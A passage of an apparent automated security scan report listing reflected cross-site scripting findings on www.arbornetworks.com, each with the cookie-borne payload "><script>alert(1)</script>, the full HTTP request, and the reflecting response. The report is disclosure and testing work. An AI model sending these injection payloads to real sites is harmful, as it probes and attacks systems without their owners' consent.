Cookie: mbfcookie[lang]=ena99e4"><script>alert(1)</script>5e86c72a29f; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:49:16 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=7c604efe1488060ed8676eaa89a27f51; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:49:17 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:49:17 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:49:18 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:49:19 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="ena99e4\"><script>alert(1)</script>5e86c72a29f">
...[SNIP]...

2.150. http://www.arbornetworks.com/en/news-events.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/news-events.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ceac"><script>alert(1)</script>63f3f812b9a was submitted in the mbfcookie[lang] cookie. This input was echoed as 9ceac\"><script>alert(1)</script>63f3f812b9a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/news-events.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en9ceac"><script>alert(1)</script>63f3f812b9a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:56:34 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=3864b6386fb87cc81c2b0c8600ee076b; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:56:34 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:56:34 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:56:35 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:56:35 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
<meta lang="en9ceac\"><script>alert(1)</script>63f3f812b9a">
...[SNIP]...

2.151. http://www.arbornetworks.com/en/partnership-inquiry-form.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/partnership-inquiry-form.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb73d"><script>alert(1)</script>c71247202a3 was submitted in the mbfcookie[lang] cookie. This input was echoed as bb73d\"><script>alert(1)</script>c71247202a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/partnership-inquiry-form.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=enbb73d"><script>alert(1)</script>c71247202a3; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:55:56 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=e1132c7739108d4aa136163325c8a1c5; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:55:56 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:55:56 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:55:57 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:56:52 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="enbb73d\"><script>alert(1)</script>c71247202a3">
...[SNIP]...

2.152. http://www.arbornetworks.com/en/services-network-support-maintenance-training-2.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/services-network-support-maintenance-training-2.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b712"><script>alert(1)</script>d3b5d470576 was submitted in the mbfcookie[lang] cookie. This input was echoed as 1b712\"><script>alert(1)</script>d3b5d470576 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/services-network-support-maintenance-training-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en1b712"><script>alert(1)</script>d3b5d470576; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:49:38 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=1a10bc0dd348e32891785e5c1c7aa6e6; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:49:39 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:49:39 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:49:40 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:49:41 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
<meta lang="en1b712\"><script>alert(1)</script>d3b5d470576">
...[SNIP]...

2.153. http://www.arbornetworks.com/en/solution-partners-4.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/solution-partners-4.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c1e4"><script>alert(1)</script>7b05d39a8bb was submitted in the mbfcookie[lang] cookie. This input was echoed as 4c1e4\"><script>alert(1)</script>7b05d39a8bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/solution-partners-4.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en4c1e4"><script>alert(1)</script>7b05d39a8bb; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:53:55 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=9af230516344f96bbe970bf33d278e37; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:53:56 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:53:56 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:53:57 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:53:58 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="en4c1e4\"><script>alert(1)</script>7b05d39a8bb">
...[SNIP]...

2.154. http://www.arbornetworks.com/en/solutions-for-places-in-your-network.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/solutions-for-places-in-your-network.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5446"><script>alert(1)</script>29761611793 was submitted in the mbfcookie[lang] cookie. This input was echoed as f5446\"><script>alert(1)</script>29761611793 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/solutions-for-places-in-your-network.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=enf5446"><script>alert(1)</script>29761611793; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:50:19 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=8780a402deff999d6ab9f141654291b0; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:50:21 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:50:21 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:50:22 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:50:22 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
<meta lang="enf5446\"><script>alert(1)</script>29761611793">
...[SNIP]...

2.155. http://www.arbornetworks.com/en/solutions-for-your-business-needs.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/solutions-for-your-business-needs.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64ac0"><script>alert(1)</script>6ebae96397e was submitted in the mbfcookie[lang] cookie. This input was echoed as 64ac0\"><script>alert(1)</script>6ebae96397e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/solutions-for-your-business-needs.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en64ac0"><script>alert(1)</script>6ebae96397e; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:50:17 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=604541f1f9e41149b2fb1c9dd4446d9a; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:50:18 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:50:18 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:50:19 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:50:19 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
<meta lang="en64ac0\"><script>alert(1)</script>6ebae96397e">
...[SNIP]...

2.156. http://www.arbornetworks.com/en/technology-partners-4.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/technology-partners-4.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53001"><script>alert(1)</script>055958a227a was submitted in the mbfcookie[lang] cookie. This input was echoed as 53001\"><script>alert(1)</script>055958a227a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/technology-partners-4.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en53001"><script>alert(1)</script>055958a227a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:54:18 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=c300a37ef4119988756fe3892abfa309; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:54:19 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:54:19 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:54:20 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:54:20 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="en53001\"><script>alert(1)</script>055958a227a">
...[SNIP]...

2.157. http://www.arbornetworks.com/en/what-we-do-network-security-solutions-services.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/what-we-do-network-security-solutions-services.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 710ca"><script>alert(1)</script>808460338d8 was submitted in the mbfcookie[lang] cookie. This input was echoed as 710ca\"><script>alert(1)</script>808460338d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/what-we-do-network-security-solutions-services.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en710ca"><script>alert(1)</script>808460338d8; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:49:03 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=b8b1c40b2e2b789de45e534d4f492b77; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:49:05 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:49:05 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:49:06 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:49:06 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
<meta lang="en710ca\"><script>alert(1)</script>808460338d8">
...[SNIP]...

2.158. http://www.arbornetworks.com/en/white-papers-global-network-security-topics-2.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/white-papers-global-network-security-topics-2.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f28af"><script>alert(1)</script>be53bf7bfc was submitted in the mbfcookie[lang] cookie. This input was echoed as f28af\"><script>alert(1)</script>be53bf7bfc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/white-papers-global-network-security-topics-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=enf28af"><script>alert(1)</script>be53bf7bfc; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:53:53 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=31b8094758816ee9cc2d818e8530d4be; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:53:53 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:53:53 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:53:54 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:53:58 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="enf28af\"><script>alert(1)</script>be53bf7bfc">
...[SNIP]...

2.159. http://www.arbornetworks.com/es/5.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /es/5.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7374"><script>alert(1)</script>b64724bdb0 was submitted in the mbfcookie[lang] cookie. This input was echoed as e7374\"><script>alert(1)</script>b64724bdb0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /es/5.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=ene7374"><script>alert(1)</script>b64724bdb0; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:57:43 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=fb818fa49d537cc5fce3a94363e01092; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:57:44 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:57:44 GMT; path=/
Set-Cookie: mbfcookie[lang]=es; expires=Thu, 03-Feb-2011 23:57:45 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:57:45 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<meta lang="ene7374\"><script>alert(1)</script>b64724bdb0">
...[SNIP]...

2.160. http://www.arbornetworks.com/es/infrastructure-security-report.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /es/infrastructure-security-report.html

